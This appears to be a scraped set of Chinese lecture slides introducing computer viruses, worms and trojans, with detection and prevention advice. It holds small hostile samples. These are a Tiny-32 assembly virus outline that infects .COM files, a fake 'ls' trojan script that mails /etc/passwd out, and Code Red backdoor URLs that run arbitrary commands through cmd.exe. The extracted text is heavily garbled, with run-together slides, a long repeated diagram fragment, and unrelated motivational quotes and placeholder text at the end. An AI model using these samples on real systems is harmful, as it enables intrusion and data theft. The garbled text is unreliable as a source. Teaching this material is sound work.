計算機病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡安全基礎課講義

《計算機病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡安全基礎課講義》由會員分享，可在線閱讀，更多相關《計算機病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡安全基礎課講義（46頁珍藏版）》請在裝配圖網(wǎng)上搜索。

1、計算機病毒、蠕蟲和特洛伊木馬提綱1.計算機病毒2.網(wǎng)絡蠕蟲3.特洛伊木馬計算機病毒 病毒結構模型 病毒的分類 引導型病毒 文件型病毒 宏病毒 病毒舉例 病毒防范計算機病毒的結構傳染條件判斷傳染代碼表現(xiàn)及破壞條件判斷破壞代碼傳染模塊表現(xiàn)模塊計算機病毒的分類 按攻擊平臺分類：DOS,Win32，MAC，Unix 按危害分類：良性、惡性 按代碼形式：源碼、中間代碼、目標碼 按宿主分類：引導型 主引導區(qū) 操作系統(tǒng)引導區(qū) 文件型 操作系統(tǒng) 應用程序 宏病毒引導型病毒引導記錄 主引導記錄（MBR）55AA主引導程序(446字節(jié))分區(qū)1(16 字節(jié))主分區(qū)表(64字節(jié)）分區(qū)2(16 字節(jié))分區(qū)3(16 字節(jié)

2、)分區(qū)4(16 字節(jié))結束標記（2字節(jié)）引導代碼及出錯信息A引導型病毒系統(tǒng)引導過程Power OnCPU&ROM BIOS InitializesPOST TestsLook for boot deviceMBR bootPartition Table LoadDOS Boot Sector RunsLoads IO.SYSMSDOS.SYSDOS Loaded引導型病毒感染與執(zhí)行過程系統(tǒng)引導區(qū)引導正常執(zhí)行病毒病毒執(zhí)行病毒駐留帶毒執(zhí)行。病毒引導系統(tǒng)病毒體。病毒的激活過程空閑區(qū)。內(nèi)存空間int8int21int2Fint4A時鐘中斷處理DOS中斷處理外設處理中斷實時時種警報中斷空閑區(qū)帶病毒程序空

3、閑區(qū)空閑區(qū)正常程序病 毒int8int8。int8。int8int8int8int8int8int8int8int8int8int8。int8int8空閑區(qū)正常程序正常程序。正常程序正常程序正常程序int8是26日？是,破壞！int8舉例小球病毒（Bouncing Ball)在磁盤上的存儲位置文件分配表病毒的第二部分000號扇區(qū)001號扇區(qū)第一個空簇FF7正常的引導扇區(qū)正常的引導扇區(qū)病毒的第一部分感染后的系統(tǒng)啟動過程啟動將病毒程序的第一部分送入內(nèi)存高端將第二部分裝入內(nèi)存，與第一部分拼接在一起讀入真正的Boot 區(qū)代碼，送到0000:TC00處修改INT 13 中斷向量，指向病毒轉(zhuǎn)移到 0000

4、:TC00處，開始真正的系統(tǒng)引導觸發(fā)條件修改后的INT 13進入INT 13中斷是否為讀盤？執(zhí)行正常的INT 13程序執(zhí)行正常的INT 13程序N所讀盤是否是自身？Y修改INT8 開始發(fā)作Y是否整點或半點Y執(zhí)行正常的INT 13程序Y是否帶病毒？N調(diào)用傳染過程感染磁盤N不發(fā)作執(zhí)行正常的INT 13程序N病毒檢測原理 特征匹配 例如，在香港病毒:1F 58 EA 1A AF 00 F0 9C:POP AXJMP F000 AF1APUSHF 行為監(jiān)控 對中斷向量表的修改 對引導記錄的修改 對.exe,.com文件的寫操作 駐留內(nèi)存 軟件模擬防范與檢測 數(shù)據(jù)備份 不要用移動介質(zhì)啟動（設置CMOS選

5、項）設置CMOS的引導記錄保護選項 安裝補丁，并及時更新 安裝防病毒軟件，及時更新病毒定義碼 限制文件共享 不輕易打開電子郵件的附件 沒有病毒處理前不要使用其他移動介質(zhì) 不要運行不可信的程序 移動介質(zhì)寫保護文件型病毒文件結構.COM文件.EXE 文件PSP Header(256 bytes)Code,Data,StackSegment(s)(64K Bytes)代碼、數(shù)據(jù)、堆棧在通一段中在內(nèi)存中的.COM是磁盤文件的鏡像 PSP Header(512 bytes)Code Segment(s)(64K)Data Segment(s)(64K)Stack Segment(s)(64K)其他可執(zhí)行

6、的文件類型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD正常正常程序程序正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭正常正常程序程序程序頭程序頭程序頭程序頭程序頭程

7、序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序程序頭病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序正常正常程序程序程序頭程序頭文件型病毒感染機理文件型病毒舉例 最簡單的病毒Tiny-32(32 bytes)尋找宿主文件 打開文件 把自己寫入文件 關閉文件MOV

8、AH,4E;setup to find a fileINT 21;find the host fileMOV AX,3D02;setup to open the host fileINT 21;open host fileMOV AH,40;setup to write file to diskINT 21;write to fileDB *.COM;what files to look for宏病毒（Macro Virus）歷史：1980年，Dr.Fredrick Cohen and Ralf Burger 論文 1994年，Microsoft Word 第一例宏病毒 Word,Excel,

9、Access,PowerPoint,Project,Lotus AmiPro,Visio,Lotus 1-2-3,AutoCAD,Corel Draw.使用數(shù)據(jù)文件進行傳播，使得反病毒軟件不再只關注可執(zhí)行文件和引導區(qū) DOE ViRT 統(tǒng)計，85%的病毒感染歸因于宏病毒 易于編寫，只需要一兩天的時間，1015行代碼 大量的用戶：90 Million MS Office Users 人們通常不交換程序，而交換數(shù)據(jù)宏病毒工作機理有毒文件.docNormal.dot激活autoopen宏寫入無毒文件.docNormal.dot啟動激活病毒注意事項 Macro 可以存在模板里，也可以存在文檔里 RTF

10、文件也可以包含宏病毒 通過IE 瀏覽器可以直接打開，而不提示下載提綱1.計算機病毒2.網(wǎng)絡蠕蟲3.特洛伊木馬蠕蟲（Worm）一個獨立的計算機程序，不需要宿主 自我復制，自主傳播（Mobile）占用系統(tǒng)或網(wǎng)絡資源、破壞其他程序 不偽裝成其他程序，靠自主傳播 利用系統(tǒng)漏洞；利用電子郵件（無需用戶參與）莫里斯蠕蟲事件 發(fā)生于1988年，當時導致大約6000臺機器癱瘓 主要的攻擊方法 Rsh，rexec：用戶的缺省認證 Sendmail 的debug模式 Fingerd的緩沖區(qū)溢出 口令猜測CR I 主要影響Windows NT系統(tǒng)和Windows 2000主要影響國外網(wǎng)絡據(jù)CERT統(tǒng)計，至8月初已經(jīng)

11、感染超過25萬臺 主要行為利用IIS 的Index服務的緩沖區(qū)溢出缺陷進入系統(tǒng)檢查c:notworm文件是否存在以判斷是否感染中 文 保 護（是 中 文windows就不修改主頁）攻擊白宮！CR II Inspired by RC I 影響波及全球 國內(nèi)影響尤其廣泛 主要行為 所利用缺陷相同 只感染windows2000系統(tǒng)，由于一些參數(shù)的問題，只會導致NT死機 休眠與掃描：中文windows，600個線程Nimda 簡介 影響系統(tǒng)：MS win9x,wind2k,win XP 傳播途徑：Email、文件共享、頁面瀏覽、MS IIS目錄遍歷、Code Red 后門 影響 群發(fā)電子郵件，付病毒

12、掃描共享文件夾，掃描有漏洞的IIS,掃描有Code Red后門的IIS Server紅色代碼病毒 紅色代碼病毒是一種結合了病毒、木馬、DDOS機制的蠕蟲。2001年7月中旬，在美國等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對中文版windows系統(tǒng)，國內(nèi)大規(guī)模蔓延。通過80端口傳播。只存在與網(wǎng)絡服務器的內(nèi)存，不通過文件載體。利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）CodeRed ICodeRed II增加了特洛依木馬的功能，并針對中國網(wǎng)站做了改進1.計算IP的方法進行了修改，使病毒傳染的更快；2.檢查是否存在CodeRedII原子，若存在則進入睡眠狀態(tài)防止反復

13、感染，若不存在則創(chuàng)建CodeRedII原子；3.創(chuàng)建300個線程進行傳染，若系統(tǒng)默認語言為簡體中文或繁體中文，則創(chuàng)建600個線程；4.檢查時間。病毒作者的意圖是傳播過程在2001年10月1日完成，之后，蠕蟲會爆發(fā)而使系統(tǒng)不斷重新啟動。5.在系統(tǒng)中安裝一個特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動都會運行，禁止系統(tǒng)的文件保護功能，并將C盤和D盤通過web服務器共享CodeRed II 攻擊形式http:/x.x.x.x/c/inetpub/scripts/root.exe

14、?/c+dirhttp:/x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機密數(shù)據(jù)等，這個后門后來也成為了nimda病毒的一個傳播模式。下面是cert/cc上提供的被攻擊服務器日志(CA-2001-11)2001-05-06 12:20:19 10.10.10.10-10.20.20.20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir 200 2001-05-06 12:20:19 10.10.10.10-10.20.20.

15、20 80 GET/scripts/././winnt/system32/cmd.exe/c+dir+.200 紅色代碼病毒的檢測和防范 針對安裝IIS的windows系統(tǒng)；是否出現(xiàn)負載顯著增加（CPU/網(wǎng)絡）的現(xiàn)象；用netstat an檢查是否有許多對外的80端口連接 在web日志中檢查是否有/default.ida?xxx.%u0078%u0000 u00=a HTTP/1.0這樣的攻擊記錄；查找系統(tǒng)中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe；檢查注冊表文件中是否增加了C和D虛擬目錄，以及文件保護功能是否被禁止。在任務管理器中檢查是否存在

16、兩個explorer.exe進程。提綱1.計算機病毒2.網(wǎng)絡蠕蟲3.特洛伊木馬特洛伊木馬 名字來源：古希臘故事 通過偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個遠程控制的后門 沒有自我復制的功能 非自主傳播 用戶主動發(fā)送給其他人 放到網(wǎng)站上由用戶下載最簡單的木馬舉例ls#!/bin/sh/bin/mail /etc/passwdlsPATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin特洛依木馬舉例 Back Orifice Cult of the Dead Cow在1998年8月發(fā)布,公開源碼軟件，遵守GPL，是功能

17、強大的遠程控制器木馬。boserver.exe、boconfig.exe、bogui.exe 在BO服務器上啟動、停止基于文本的應用程序 目錄和文件操作。包括創(chuàng)建、刪除、查看目錄、查找、解壓、壓縮。共享。創(chuàng)建共享資源 HTTP服務。啟動或停止HTTP服務。擊鍵記錄。將BO服務器上用戶的擊鍵記錄在一個文本文件中，同時記錄執(zhí)行輸入的窗口名。（可以獲得用戶口令）特洛依木馬 視頻輸入、播放。捕捉服務器屏幕到一個位圖文件中。網(wǎng)絡連接。列出和斷開BO服務器上接入和接出的連接，可以發(fā)起新連接。查看信息。查看所有網(wǎng)絡端口、域名、服務器和可見的共享“出口”。返回系統(tǒng)信息，包括機器名、當前用戶、CPU類型、內(nèi)存容

18、量及可用內(nèi)存、Windows版本、驅(qū)動器類型、硬盤容量及使用空間。端口重定向。注冊表 鎖住或重啟計算機。傳輸文件特洛依木馬 使用netstat a 檢查是否還有未知端口監(jiān)聽(默認31337)檢測和刪除 注冊表HLMsoftwaremicrosoftwindowscurrentVersionrunservices鍵值，是否有“Name Data.exe”，若有則刪除 C:windowssystem目錄：刪除“.exe”文件和windll.dll文件特洛依木馬 其他木馬 國外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor 等 國內(nèi)（更常見）冰河、

19、廣外女生、netspy、黑洞等刪除木馬的通用方法Win.ini文件windows節(jié)中run=和loadsystem.ini文件boot節(jié)的shell=explorer.exeAutoexec.bat文件win命令注冊表HLMsoftwaremicrosoftwindowscurrentversionrunHCUsoftwaremicrosoftwindowscurrentversionrunonceHCRexefileshellopencommand“%1”%*HCUcontrol paneldesktopwallpaper更高級的木馬技術 服務器端程序文件的隱藏 問題：磁盤上的文件、系統(tǒng)中的

20、進程 木馬：DLL 陷阱 防范：DLL 簽名技術 隱藏端口監(jiān)聽 寄生：選擇一個已經(jīng)打開的端口，如80 潛伏：不使用TCP/UDP,使用ICMP 突破防火墻的限制 反彈端口型木馬：突破防火墻的限制:反彈端口型木馬Web Server病毒、蠕蟲與木馬的比較特性病毒蠕蟲木馬宿主需要不需要需要表現(xiàn)形式不以文件形式存在獨立的文件偽裝成其他文件傳播方式依賴宿主文件或介質(zhì)自主傳播依靠用戶主動傳播主要危害破壞數(shù)據(jù)完整性、系統(tǒng)完整性侵占資源留下后門，竊取信息傳播速度快極快慢提綱1.網(wǎng)絡攻擊方法竊聽口令破解端口掃描和信息收集緩沖區(qū)溢出漏洞掃描拒絕服務2.惡意移動代碼計算機病毒網(wǎng)絡蠕蟲特洛伊木馬其他惡意代碼9、靜夜

21、四無鄰，荒居舊業(yè)貧。22.8.1122.8.11Thursday,August 11,202210、雨中黃葉樹，燈下白頭人。20:32:1320:32:1320:328/11/2022 8:32:13 PM11、以我獨沈久，愧君相見頻。22.8.1120:32:1320:32Aug-2211-Aug-2212、故人江海別，幾度隔山川。20:32:1320:32:1320:32Thursday,August 11,202213、乍見翻疑夢，相悲各問年。22.8.1122.8.1120:32:1320:32:13August 11,202214、他鄉(xiāng)生白發(fā)，舊國見青山。2022年8月11日星期四下

22、午8時32分13秒20:32:1322.8.1115、比不了得就不比，得不到的就不要。2022年8月下午8時32分22.8.1120:32August 11,202216、行動出成果，工作出財富。2022年8月11日星期四20時32分13秒20:32:1311 August 202217、做前，能夠環(huán)視四周；做時，你只能或者最好沿著以腳為起點的射線向前。下午8時32分13秒下午8時32分20:32:1322.8.119、沒有失敗，只有暫時停止成功！。22.8.1122.8.11Thursday,August 11,202210、很多事情努力了未必有結果，但是不努力卻什么改變也沒有。20:32:

23、1320:32:1320:328/11/2022 8:32:13 PM11、成功就是日復一日那一點點小小努力的積累。22.8.1120:32:1320:32Aug-2211-Aug-2212、世間成事，不求其絕對圓滿，留一份不足，可得無限完美。20:32:1320:32:1320:32Thursday,August 11,202213、不知香積寺，數(shù)里入云峰。22.8.1122.8.1120:32:1320:32:13August 11,202214、意志堅強的人能把世界放在手中像泥塊一樣任意揉捏。2022年8月11日星期四下午8時32分13秒20:32:1322.8.1115、楚塞三湘接，荊

24、門九派通。2022年8月下午8時32分22.8.1120:32August 11,202216、少年十五二十時，步行奪得胡馬騎。2022年8月11日星期四20時32分13秒20:32:1311 August 202217、空山新雨后，天氣晚來秋。下午8時32分13秒下午8時32分20:32:1322.8.119、楊柳散和風，青山澹吾慮。22.8.1122.8.11Thursday,August 11,202210、閱讀一切好書如同和過去最杰出的人談話。20:32:1320:32:1320:328/11/2022 8:32:13 PM11、越是沒有本領的就越加自命不凡。22.8.1120:32:

25、1320:32Aug-2211-Aug-2212、越是無能的人，越喜歡挑剔別人的錯兒。20:32:1320:32:1320:32Thursday,August 11,202213、知人者智，自知者明。勝人者有力，自勝者強。22.8.1122.8.1120:32:1320:32:13August 11,202214、意志堅強的人能把世界放在手中像泥塊一樣任意揉捏。2022年8月11日星期四下午8時32分13秒20:32:1322.8.1115、最具挑戰(zhàn)性的挑戰(zhàn)莫過于提升自我。2022年8月下午8時32分22.8.1120:32August 11,202216、業(yè)余生活要有意義，不要越軌。2022年8月11日星期四20時32分13秒20:32:1311 August 202217、一個人即使已登上頂峰，也仍要自強不息。下午8時32分13秒下午8時32分20:32:1322.8.11MOMODA POWERPOINTLorem ipsum dolor sit amet,consectetur adipiscing elit.Fusce id urna blandit,eleifend nulla ac,fringilla purus.Nulla iaculis tempor felis ut cursus.感 謝 您 的 下 載 觀 看感 謝 您 的 下 載 觀 看專家告訴